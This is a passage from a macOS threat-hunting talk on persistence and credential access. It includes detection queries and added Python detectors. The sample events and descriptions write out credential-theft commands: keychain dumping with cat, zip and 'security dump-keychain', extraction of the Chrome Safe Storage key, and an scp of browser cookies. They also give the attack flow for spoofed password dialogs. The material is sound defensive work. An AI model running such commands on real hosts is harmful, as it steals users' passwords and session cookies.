    file_path:(*com.apple* OR *com.appie* OR (*update* AND *mac*) OR (*update* AND *system*)) AND
    -file_path:("/Library/Apple/System/Library/LaunchAgents/*" OR "/Library/Apple/System/Library/LaunchDaemons/*" OR "/System/Library/LaunchDaemons/*" OR "/System/Library/LaunchAgents/*")

Slide 65

Suspicious Launch Agent/Daemon PLIST files. Let’s hunt it!
Search for PLIST files with short names:
    dev_os_type:macos AND event_type:(FileCreate OR FileInfo) AND
    file_path:("*/Library/LaunchAgents/*" OR "*/Library/LaunchDaemons/*") AND
    file_path.keyword:/.+\/.{1,3}.plist/

Slide 66

Suspicious Launch Agent/Daemon PLIST files. Let’s hunt it!
Search for hidden PLIST files:
    dev_os_type:macos AND event_type:(FileCreate OR FileInfo) AND
    file_path:("*/Library/LaunchAgents/*" OR "*/Library/LaunchDaemons/*") AND
    file_path.keyword:/.+\/\..+/ AND
    -proc_file_path:"/Library/Application Support/AirWatch/hubd"

Slide 67

Hunting for suspicious Launch Agents/Daemons

Slide 68

Hunting suspicious PLIST targets – Telemetry
Osquery launchd table
KnockKnock command line scan with output to a file:

Slide 69

Hidden files or files from hidden folders as Launch Agent/Daemon targets
Xloader stealer: the Launch Agent starts a file from a hidden folder (.URzH)
OSX.LamePyre backdoor starts two hidden files (.system and .helper)

Slide 70

Hidden files or files from hidden folders as Launch Agent/Daemon targets. Let’s hunt it!
Search for Launch Agents and Launch Daemons that start hidden files or files from hidden folders:
    sensor_type:osquery AND rule_name:"pack_inventory_launchd" AND service_autorun:true AND
    file_path.keyword:/.+\/\..+/

Slide 71

Files from temporary folders as Launch Agent/Daemon targets. Let’s hunt it!
Search for Launch Agents and Launch Daemons that start files from temporary folders:
    sensor_type:osquery AND rule_name.keyword:"pack_inventory_launchd" AND service_autorun:true AND
    file_path:("/tmp/*" OR "/var/tmp/*" OR "/private/var/tmp/*" OR "/private/tmp/*" OR "*/etc/*")

Slide 72

Files from temporary folders as Launch Agent/Daemon targets. Let’s hunt it!
Search for execution of files from temporary folders with /sbin/launchd as the parent:
    dev_os_type:macos AND event_type:(ProcessCreate OR ProcessInfo) AND
    proc_p_file_path:"/sbin/launchd" AND
    proc_file_path:("/tmp/*" OR "/var/tmp/*" OR "/private/var/tmp/*" OR "/private/tmp/*" OR "*/etc/*") AND
    -proc_file_path.keyword:/.+\/tmp\/PKInstallSandbox\.[0-9A-Za-z]+\/Scripts\/.+/

Slide 73

Script interpreters or shells as Launch Agents/Daemons targets
OSX.Siggen, a fake WhatsApp Trojan. The Launch Agent is downloaded via curl and starts a bash script
XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor and uses a Launch Agent as a persistence mechanism that starts bash

Slide 74

Script interpreters or shells as Launch Agents/Daemons targets
WildPressure malware decodes the XML, fills the [pyscript] placeholder with the path to the Python script and drops the .plist file for persistence
Silver Sparrow sets up persistence with a Launch Agent that starts /bin/sh

Slide 75

Script interpreters or shells as Launch Agents/Daemons targets
OSX.ppminer: the trojan installs a Launch Agent that starts a compiled AppleScript using the osascript tool
CrossRAT persists as a Launch Agent that starts a .jar file using the java interpreter

Slide 76

Launch Agents/Daemons that start interpreters. Let’s hunt it!
Search for Launch Agents and Launch Daemons that start interpreters:
    dev_os_type:macos AND sensor_type:osquery AND rule_name:"pack_inventory_launchd" AND service_autorun:true AND
    (
      cmdline:(*bash* OR *zsh* OR *ksh* OR *tcsh* OR *dash* OR *tclsh* OR *fish* OR "*/bin/sh*" OR *perl* OR *ruby* OR *python* OR *osascript* OR *javascript* OR *curl* OR *wget* OR *java*) OR
      file_path.keyword:(*.sh OR *.bash OR *.py OR *.pl OR *.rb OR *.scpt OR *.scptd OR *.jar)
    )
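The PLIST-name heuristics of slides 63 to 66 and the target heuristics of slides 70 to 76 applied directly to a launchd plist file with plistlib, as a host-side check that does not depend on the osquery launchd table. This is an added example, not code from the talk; the sample plists are constructed, and the hidden-target check is generalised to look at every path argument rather than only the program path.

```python
import plistlib
import posixpath
import re

SYSTEM_DIRS = ("/System/Library/LaunchAgents/", "/System/Library/LaunchDaemons/",
               "/Library/Apple/System/Library/LaunchAgents/", "/Library/Apple/System/Library/LaunchDaemons/")
TMP_DIRS = ("/tmp/", "/var/tmp/", "/private/var/tmp/", "/private/tmp/")
INTERPRETER_WORDS = ("bash", "zsh", "ksh", "tcsh", "dash", "tclsh", "fish", "/bin/sh", "perl", "ruby",
                     "python", "osascript", "javascript", "curl", "wget", "java")
SCRIPT_EXTS = (".sh", ".bash", ".py", ".pl", ".rb", ".scpt", ".scptd", ".jar")


def review_launchd_plist(path, data):
    """Apply the slide 63-76 heuristics to one Launch Agent/Daemon plist (its path and raw bytes)."""
    plist = plistlib.loads(data)
    name = posixpath.basename(path)
    lname = name.lower()
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    program = str(plist.get("Program") or (args[0] if args else ""))
    cmdline = " ".join(args) or program
    findings = []
    # Slide 64: com.apple-like names (the com.appIe look-alike lower-cases to com.appie) and
    # "update" + "mac"/"system" names outside the SIP-protected system folders.
    if not path.startswith(SYSTEM_DIRS) and (
            "com.apple" in lname or "com.appie" in lname
            or ("update" in lname and ("mac" in lname or "system" in lname))):
        findings.append("masquerading_system_service")
    if re.fullmatch(r".{1,3}\.plist", name):                    # slide 65: k.plist, a.plist, 1.plist
        findings.append("short_name")
    if name.startswith("."):                                    # slide 66: hidden plist file
        findings.append("hidden_plist")
    # Slide 70: the target is a hidden file or sits in a hidden folder (checked on every path argument).
    if any(part.startswith(".") for a in [program] + args for part in a.split("/")[1:]):
        findings.append("hidden_target")
    if program.startswith(TMP_DIRS) or "/etc/" in program:      # slide 71
        findings.append("tmp_target")
    # Slide 76: the target is a shell, an interpreter, a download tool or a script file.
    if any(w in cmdline for w in INTERPRETER_WORDS) or program.lower().endswith(SCRIPT_EXTS):
        findings.append("interpreter_target")
    if plist.get("RunAtLoad"):                                  # the service_autorun:true filter of the hunts
        findings.append("run_at_load")
    return findings


# Constructed sample plists (not taken from any real malware).
SAMPLES = {
    "/Users/alice/Library/LaunchAgents/com.apple.softwareupdate.plist": {
        "Label": "com.apple.softwareupdate",
        "ProgramArguments": ["/bin/sh", "/Users/alice/.hidden/update.sh"], "RunAtLoad": True},
    "/Library/LaunchDaemons/.com.apple.WindowServer.plist": {
        "Label": "com.apple.WindowServer", "Program": "/private/tmp/.ws/server", "RunAtLoad": True},
    "/Users/alice/Library/LaunchAgents/a.plist": {
        "Label": "a", "ProgramArguments": ["/usr/bin/python3", "/Users/alice/Library/Caches/x.py"]},
    "/Library/LaunchDaemons/com.example.agent.plist": {
        "Label": "com.example.agent",
        "ProgramArguments": ["/Library/Application Support/Example/agentd", "--daemon"], "RunAtLoad": True},
}


def review_samples():
    """Serialise each sample with plistlib and review it as if it had been read from disk."""
    return {path: review_launchd_plist(path, plistlib.dumps(d)) for path, d in SAMPLES.items()}


if __name__ == "__main__":
    for path, findings in review_samples().items():
        print(path, findings)
```

On a real host the same function takes the bytes returned by open(path, "rb").read() for each file under the LaunchAgents/LaunchDaemons folders listed on slide 51.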

Slide 77

T1547.015 – Boot or Logon Autostart Execution: Login Items
• Login items are launched when the user logs in, and continue running until the user logs out or manually quits them
• There are two ways to add a login item: using the Service Management framework, and using a shared file list
• Shared file list login items can be set using scripting languages such as AppleScript or the LSSharedFileListInsertItemURL API, whereas the Service Management framework uses the API call SMLoginItemSetEnabled
• The entries of "Login Items" are stored in:
  • ~/Library/Preferences/com.apple.loginitems.plist – before High Sierra
  • ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm – since High Sierra
  • /private/var/db/com.apple.backgroundtaskmanagement/BackgroundItems-v*.btm (for example, BackgroundItems-v7.btm) – since Ventura
• Since macOS 13 Ventura, when a Login Item is added, the system generates a notification alert:
Before macOS 13 Ventura
Since macOS 13 Ventura

Slide 78

T1547.015 – Boot or Logon Autostart Execution: Login Items
OSX/Dok utilizes AppleScript to create the Login Item named “AppStore”:
The Apfell Mythic framework agent has the command persist_loginitem_allusers that adds a login item for all users via LSSharedFileListInsertItemURL:

Slide 79

Create Login Item using osascript. Let’s hunt it!
Search for osascript usage to create a Login Item:
    dev_os_type:macos AND cmdline:*osascript* AND cmdline:"*System Events*" AND cmdline:"*login item*" AND cmdline:*path* AND
    -proc_p_cmdline:*PKInstallSandbox*

Slide 80

Generic detection of Login Items creation/deletion
Modification of the Background Items database file can be a sign of Login Item creation/deletion:
    dev_os_type:macos AND event_type:FileChange AND file_path:(*BackgroundItems* OR "*/com.apple.loginitems.plist")

Slide 81

Generic detection of suspicious Launch Agents, Launch Daemons or Login Items
Search for recently created unsigned files started by launchd; this can be a sign of a newly created Launch Agent, Launch Daemon or Login Item:
    dev_os_type:macos AND event_type:ProcessCreate AND proc_p_file_path:"/sbin/launchd" AND
    proc_file_age:<600 AND -proc_file_sig_result:good

Slide 82

Credential Access

Slide 83

macOS Credential Access

Slide 84

Spoofing credentials dialog using AppleScript (osascript)
MacStealer uses the standard osascript tool to show fake password prompts for gathering credentials:
Atomic Stealer uses a crude but effective means of extracting the user’s login password via AppleScript spoofing:

Slide 85

Spoofing credentials dialog using AppleScript. Attack flow
1. Show a spoofed credentials dialog box
2. Check the entered password using the sudo or dscl commands
3. Repeatedly show the spoofed credentials dialog box until the correct password is supplied

Slide 86

Spoofing credentials dialog with osascript. Let’s hunt it!
Search for osascript usage to spoof a credentials dialog:
    dev_os_type:macos AND cmdline:*osascript* AND cmdline:"*display dialog*" AND
    cmdline:(*password* OR *пароль* OR "*hidden answer*")

Slide 87

Checking passwords via sudo or dscl. Let’s hunt it!
Search for sudo and dscl tool usage to check a password:
    dev_os_type:macos AND
    ( cmdline.keyword:/.*echo .+\|.*sudo \-S .+/ OR (cmdline:*dscl* AND cmdline:*authonly*) ) AND
    -cmdline:*ssh*

Slide 88

Metasploit password_prompt_spoof module
The osx/gather/password_prompt_spoof msf module drops a script into a hidden folder inside /tmp and executes it with the osascript tool

Slide 89

Metasploit password_prompt_spoof module. Let’s hunt it!
Search for usage of the osascript tool to run scripts from tmp:
    dev_os_type:macos AND (
      (cmdline.keyword:(/.*osascript .{0,10}\/tmp\/.+/ OR /.*osascript .{0,10}\/var\/tmp\/.+/ OR /.*osascript .{0,10}\/private\/var\/tmp\/.+/)) OR
      (event_type:(ProcessCreate OR ProcessInfo) AND cmdline:*osascript* AND proc_cwd:*tmp*)
    )

Slide 90

Spoofing credentials dialog using API calls
It is possible to spoof a credentials dialog via NSAlert API calls. Below is an example from the Swift-Attack testing tools:

Slide 91

Keychain – wtf?
• The infrastructure and a set of APIs used by Apple operating systems and third-party apps to store and retrieve passwords, keys and other sensitive credentials
• Applications need to handle secure information, such as keys and login tokens. The keychain provides a secure way to store these items; it is like DPAPI on Windows hosts
• There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain
• The Login Keychain stores user passwords and information:
  • ~/Library/Keychains/login.keychain-db (but may differ)
• The System Keychain stores items accessed by the operating system, such as items shared among users on a host:
  • /Library/Keychains/System.keychain
• The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service
• Native tools for interacting with Keychains: security (CLI), Keychain Access (GUI)
“Keychain Access is a macOS app that stores your passwords and account information, and reduces the number of passwords you have to remember and manage.” - Apple

Slide 92

Slide 92 text

92 Keychain Dumping

Slide 93

Slide 93 text

93 Grab Keychain files. The Meterpreter enum_osx post-exploitation module gets the Keychain file using the cat command (/bin/cat "/Users/name/Library/Keychains/login.keychain-db"): Atomic Stealer steals the user’s keychain contents. A process called ‘unix1’ is spawned in memory to obtain the keychain:

Slide 94

Slide 94 text

94 Grab Keychain files. The OSX/Proton backdoor collects user Keychains using the zip command (zip -r %@/KC.zip ~/Library/Keychains/ /Library/Keychains/;): The Calisto trojan is able to steal the contents of the Keychain and archive it using the zip command:

Slide 95

Slide 95 text

95 Grab Keychain files. Let’s hunt it! Metasploit enum_osx module. Search for Keychain paths or well-known Keychain dumping tool names in the command line: cmdline:("*/Library/Keychains/*" OR "*login.keychain*" OR "*System.keychai*" OR "*keychain_dumper*" OR *libkeystealClient* OR *chainbreaker* OR *keychaindump* OR "*dump-keychain*") AND -proc_file_path:"/usr/bin/security" AND -cmdline:("*/usr/bin/security*" OR *chown* OR *chmod*) AND -cmdline.keyword:(/ls .+/ OR /cd .+/ OR /.*security .+/)

Slide 96

Slide 96 text

96 Grab Keychain files. Let’s hunt it! Search for files whose names contain the word "keychain" or the names of well-known Keychain dumping tools: dev_os_type:macos AND event_type:(FileCreate OR FileInfo) AND file_path:(*keychain* OR *chainbreaker*) AND -file_path:("/usr/local/bin/git-credential-osxkeychain" OR "/usr/sbin/systemkeychain" OR "/usr/local/bin/docker-credential-osxkeychain" OR "*/Library/Keychains*")

Slide 97

Slide 97 text

97 Dumping of Keychain content via security command. The "security dump-keychain" command can be used to dump the content of the keychain storage:

Slide 98

Slide 98 text

98 Dumping of Keychain Content via Security Command. Let’s hunt it! Search for security tool usage with the dump-keychain option: dev_os_type:macos AND cmdline:*security* AND cmdline:"*dump-keychain*" AND cmdline.keyword:(/.+ \-d.*/ OR /.+ \-r.*/)
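The three Keychain hunts on slides 95, 96 and 98 share one shape: a list of suspicious substrings, then a list of carve-outs for legitimate tooling. The following added Python example (not code from the talk or from BI.ZONE) applies all three to constructed process and file events; the events, user name and paths are made up, and substring matching is case-sensitive here where the analyzed Kibana fields may not be.

```python
import re
from typing import Dict, List

# Constructed sample events (made up for this example, not real telemetry).
PROCESS_EVENTS: List[Dict[str, str]] = [
    {"cmdline": "/bin/cat /Users/alice/Library/Keychains/login.keychain-db",
     "proc_file_path": "/bin/cat"},
    {"cmdline": "zip -r /tmp/KC.zip /Users/alice/Library/Keychains/ /Library/Keychains/",
     "proc_file_path": "/usr/bin/zip"},
    {"cmdline": "python3 /tmp/chainbreaker.py --dump-all",
     "proc_file_path": "/usr/bin/python3"},
    # the security tool itself is carved out of slide 95 and handled by slide 98
    {"cmdline": "security dump-keychain -d /Users/alice/Library/Keychains/login.keychain-db",
     "proc_file_path": "/usr/bin/security"},
    # no -d / -r: slide 98 does not flag it
    {"cmdline": "security dump-keychain login.keychain-db",
     "proc_file_path": "/usr/bin/security"},
    # excluded by the ls and chmod carve-outs
    {"cmdline": "ls /Users/alice/Library/Keychains/", "proc_file_path": "/bin/ls"},
    {"cmdline": "chmod 600 /Users/alice/Library/Keychains/login.keychain-db",
     "proc_file_path": "/bin/chmod"},
]
FILE_EVENTS: List[Dict[str, str]] = [
    {"event_type": "FileCreate", "file_path": "/tmp/chainbreaker.py"},
    {"event_type": "FileCreate", "file_path": "/Users/alice/Downloads/keychain_dumper"},
    # expected on a developer box, and the keychain folder itself: excluded
    {"event_type": "FileCreate", "file_path": "/usr/local/bin/git-credential-osxkeychain"},
    {"event_type": "FileInfo", "file_path": "/Users/alice/Library/Keychains/login.keychain-db"},
    {"event_type": "FileCreate", "file_path": "/Users/alice/notes.txt"},
]

# Slide 95: keychain paths and dumping tool names, plus carve-outs.
KEYCHAIN_TERMS = ["/Library/Keychains/", "login.keychain", "System.keychain",
                  "keychain_dumper", "libkeystealClient", "chainbreaker",
                  "keychaindump", "dump-keychain"]
CMDLINE_EXCLUDE_TERMS = ["/usr/bin/security", "chown", "chmod"]
CMDLINE_EXCLUDE_RE = re.compile(r"ls .+|cd .+|.*security .+")  # anchored like cmdline.keyword
# Slide 96: legitimate binaries whose names contain 'keychain'.
FILE_EXCLUDE_EXACT = {"/usr/local/bin/git-credential-osxkeychain",
                      "/usr/sbin/systemkeychain",
                      "/usr/local/bin/docker-credential-osxkeychain"}
# Slide 98: only dumps that ask for data (-d) or raw content (-r).
DUMP_OPTS = re.compile(r".+ -d.*|.+ -r.*")


def keychain_cmdline_hits(events: List[Dict[str, str]]) -> List[str]:
    hits = []
    for ev in events:
        cmd = ev["cmdline"]
        if not any(t in cmd for t in KEYCHAIN_TERMS):
            continue
        if ev["proc_file_path"] == "/usr/bin/security":
            continue
        if any(t in cmd for t in CMDLINE_EXCLUDE_TERMS) or CMDLINE_EXCLUDE_RE.fullmatch(cmd):
            continue
        hits.append(cmd)
    return hits


def keychain_file_hits(events: List[Dict[str, str]]) -> List[str]:
    hits = []
    for ev in events:
        if ev["event_type"] not in ("FileCreate", "FileInfo"):
            continue
        path = ev["file_path"]
        low = path.lower()
        if "keychain" not in low and "chainbreaker" not in low:
            continue
        if path in FILE_EXCLUDE_EXACT or "/Library/Keychains" in path:
            continue
        hits.append(path)
    return hits


def dump_keychain_hits(events: List[Dict[str, str]]) -> List[str]:
    return [ev["cmdline"] for ev in events
            if "security" in ev["cmdline"] and "dump-keychain" in ev["cmdline"]
            and DUMP_OPTS.fullmatch(ev["cmdline"])]


if __name__ == "__main__":
    print("cmdline:", keychain_cmdline_hits(PROCESS_EVENTS))
    print("files:  ", keychain_file_hits(FILE_EVENTS))
    print("dumps:  ", dump_keychain_hits(PROCESS_EVENTS))
```

Note how the carve-outs interact: the slide 95 hunt deliberately drops anything run by /usr/bin/security so that the narrower slide 98 hunt, which keys on the -d and -r options, is the only one that fires on the native tool.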

Slide 99

Slide 99 text

99 Browsers cookies and credentials theft
Cookies storage locations:
• Chrome: ~/Library/Application Support/Google/Chrome/Default/Cookies
• Firefox: ~/Library/Application Support/Firefox/Profiles/*.default/cookies.sqlite
• Safari: ~/Library/Safari/LocalStorage/*, ~/Library/Cookies/*
Credentials storage locations:
• Chrome: ~/Library/Application Support/Google/Chrome/Default/Login Data
• Firefox: ~/Library/Application Support/Firefox/Profiles/*.default/logins.json
• Safari: ~/Library/Safari/Form Values/*
Credentials from Password Stores: Credentials from Web Browsers
Steal Web Session Cookie
• Browser cookies and saved passwords are highly valuable to attackers
• Stolen cookies and passwords can be used to gain access to internal/external applications

Slide 100

Slide 100 text

100 Browsers cookies and credentials theft examples. OSX/Proton collects private browser data using the zip command: The XCSSET safari_cookie module steals Safari cookies using the scp command:

Slide 101

Slide 101 text

101 Browsers cookies theft. Let’s hunt it! Search for paths to the browser cookies storage in the command lines: dev_os_type:macos AND cmdline:("*/Library/Cookies*" OR ("*/Firefox/Profiles/*" AND "*cookies.sqlite*") OR "*/Library/Application Support/Google/Chrome/Default/Cookies*" OR "*/Google/Chrome Beta/Default/Cookies*" OR "*/Chromium/Default/Cookies*" OR "*/Microsoft Edge/Default/Cookies*" OR "*/BraveSoftware/Brave-Browser/Default/Cookies*" OR "*/com.operasoftware.Opera/Default/Cookies*" OR "*/com.operasoftware.OperaGX/Default/Cookies*" OR "*/Vivaldi/Default/Cookies*" OR "*/Coccoc/Default/Cookies*" OR "*/Yandex/YandexBrowser/Default/Cookies")

Slide 102

Slide 102 text

102 Browsers credentials theft. Let’s hunt it! Search for paths to the browser credentials storage in the command lines: dev_os_type:macos AND cmdline:("*/Library/Safari/Form Values/*" OR ("*/Firefox/Profiles/*" AND "*logins.json*") OR "*/Library/Application Support/Google/Chrome/Default/Login Data*" OR "*/Google/Chrome Beta/Default/Login Data*" OR "*/Chromium/Default/Login Data*" OR "*/Microsoft Edge/Default/Login Data*" OR "*/BraveSoftware/Brave-Browser/Default/Login Data*" OR "*/com.operasoftware.Opera/Default/Login Data*" OR "*/com.operasoftware.OperaGX/Default/Login Data*" OR "*/Vivaldi/Default/Login Data*" OR "*/Coccoc/Default/Login Data*" OR "*/YandexBrowser/Default/Login Data")

Slide 103

Slide 103 text

103 Decryption of stolen browser’s data
• Chrome encrypts all user data files with a key stored in the login keychain:
  • Cookies
  • History
  • Passwords
  • Saved Payment information
• The encryption key is base64 encoded and stored as the Chrome Safe Storage key in the user’s Keychain
• An attacker can get this key from the grabbed copy of the login keychain
• Another way to get Chrome Safe Storage is to use the security tool with the “find-generic-password” option
• After obtaining the key, the ChromeCookieDecryptor tool (https://github.com/marx-yu/ChromeCookieDecryptor) can be used to decrypt the data

Slide 104

Slide 104 text

104 HackBrowserData credentials dumping tool. HackBrowserData gets the Chromium master key from the Keychain using the security tool with the “find-generic-password” option:

Slide 105

Slide 105 text

105 Using the security tool to get the browser’s master key. Let’s hunt it! Search for security tool usage to get a browser’s master key from the user’s Keychain: dev_os_type:macos AND cmdline:*security* AND cmdline:("*find-generic-password*" OR "*find-internet-password*") AND cmdline:(*Chrome* OR *Chromium* OR *Opera* OR *Safari* OR *Brave* OR *Microsoft Edge* OR *Edge* OR *Firefox*) AND -proc_p_file_path:("*/Applications/Keeper Password Manager.app/Contents/*" OR "*/Contents/MacOS/Keeper Password Manager Helper*")
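The browser hunts on slides 101, 102 and 105 are path lists plus one parent-process carve-out. The following added Python example (not code from the talk, from BI.ZONE or from HackBrowserData) runs them over constructed process events; the events, user name and destination host are made up, the credentials path list is derived from the cookie list by swapping the file name (so the Yandex entry keeps its "/Yandex/" prefix, unlike slide 102), and the Firefox saved-logins file is taken to be logins.json.

```python
from typing import Dict, List

# Constructed sample process events (made up for this example, not real
# telemetry). proc_p_file_path is the parent process image.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"cmdline": "cp /Users/alice/Library/Cookies/Cookies.binarycookies /tmp/.c",
     "proc_p_file_path": "/bin/zsh"},
    {"cmdline": "scp /Users/alice/Library/Application Support/Firefox/Profiles/x1y2.default/cookies.sqlite user@example-host:/in/",
     "proc_p_file_path": "/bin/sh"},
    {"cmdline": "sqlite3 /Users/alice/Library/Application Support/Google/Chrome/Default/Login Data .dump",
     "proc_p_file_path": "/bin/zsh"},
    {"cmdline": 'security find-generic-password -w -s "Chrome Safe Storage"',
     "proc_p_file_path": "/bin/zsh"},
    # same command issued by Keeper's helper: legitimate, carved out on slide 105
    {"cmdline": 'security find-generic-password -w -s "Chrome Safe Storage"',
     "proc_p_file_path": "/Applications/Keeper Password Manager.app/Contents/MacOS/Keeper Password Manager Helper"},
    # benign: a browser name in the command line is not enough on its own
    {"cmdline": "open -a Google Chrome", "proc_p_file_path": "/bin/zsh"},
]

# Slide 101: cookie storage paths (Firefox needs profile dir AND file name).
COOKIE_PATHS = [
    "/Library/Cookies",
    "/Library/Application Support/Google/Chrome/Default/Cookies",
    "/Google/Chrome Beta/Default/Cookies",
    "/Chromium/Default/Cookies",
    "/Microsoft Edge/Default/Cookies",
    "/BraveSoftware/Brave-Browser/Default/Cookies",
    "/com.operasoftware.Opera/Default/Cookies",
    "/com.operasoftware.OperaGX/Default/Cookies",
    "/Vivaldi/Default/Cookies",
    "/Coccoc/Default/Cookies",
    "/Yandex/YandexBrowser/Default/Cookies",
]
# Slide 102: same Chromium-family layout with "Login Data", plus Safari.
CRED_PATHS = ["/Library/Safari/Form Values/"] + [
    p.replace("/Cookies", "/Login Data") for p in COOKIE_PATHS if p != "/Library/Cookies"]
FIREFOX_PROFILE = "/Firefox/Profiles/"

# Slide 105: security tool reading a browser's keychain item.
BROWSER_NAMES = ["Chrome", "Chromium", "Opera", "Safari", "Brave",
                 "Microsoft Edge", "Edge", "Firefox"]
KEEPER_PARENTS = ["/Applications/Keeper Password Manager.app/Contents/",
                  "/Contents/MacOS/Keeper Password Manager Helper"]


def _storage_hits(events, paths, firefox_file):
    hits = []
    for ev in events:
        cmd = ev["cmdline"]
        if any(p in cmd for p in paths) or (FIREFOX_PROFILE in cmd and firefox_file in cmd):
            hits.append(cmd)
    return hits


def browser_cookie_hits(events: List[Dict[str, str]]) -> List[str]:
    return _storage_hits(events, COOKIE_PATHS, "cookies.sqlite")


def browser_credential_hits(events: List[Dict[str, str]]) -> List[str]:
    return _storage_hits(events, CRED_PATHS, "logins.json")


def browser_master_key_hits(events: List[Dict[str, str]]) -> List[str]:
    hits = []
    for ev in events:
        cmd = ev["cmdline"]
        if "security" not in cmd:
            continue
        if "find-generic-password" not in cmd and "find-internet-password" not in cmd:
            continue
        if not any(name in cmd for name in BROWSER_NAMES):
            continue
        if any(k in ev["proc_p_file_path"] for k in KEEPER_PARENTS):
            continue
        hits.append(cmd)
    return hits


if __name__ == "__main__":
    print("cookies:    ", browser_cookie_hits(SAMPLE_EVENTS))
    print("credentials:", browser_credential_hits(SAMPLE_EVENTS))
    print("master key: ", browser_master_key_hits(SAMPLE_EVENTS))
```

The Keeper carve-out is the part worth tuning per environment: any password manager or credential helper that legitimately reads browser keychain items will show up here, and the parent image path is a more reliable discriminator than the command line, which is identical in both cases.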

Slide 106

Slide 106 text

106 To be continued… Privilege Escalation, Defense Evasion, Discovery and Lateral Movement

Slide 107

Slide 107 text

107 Questions?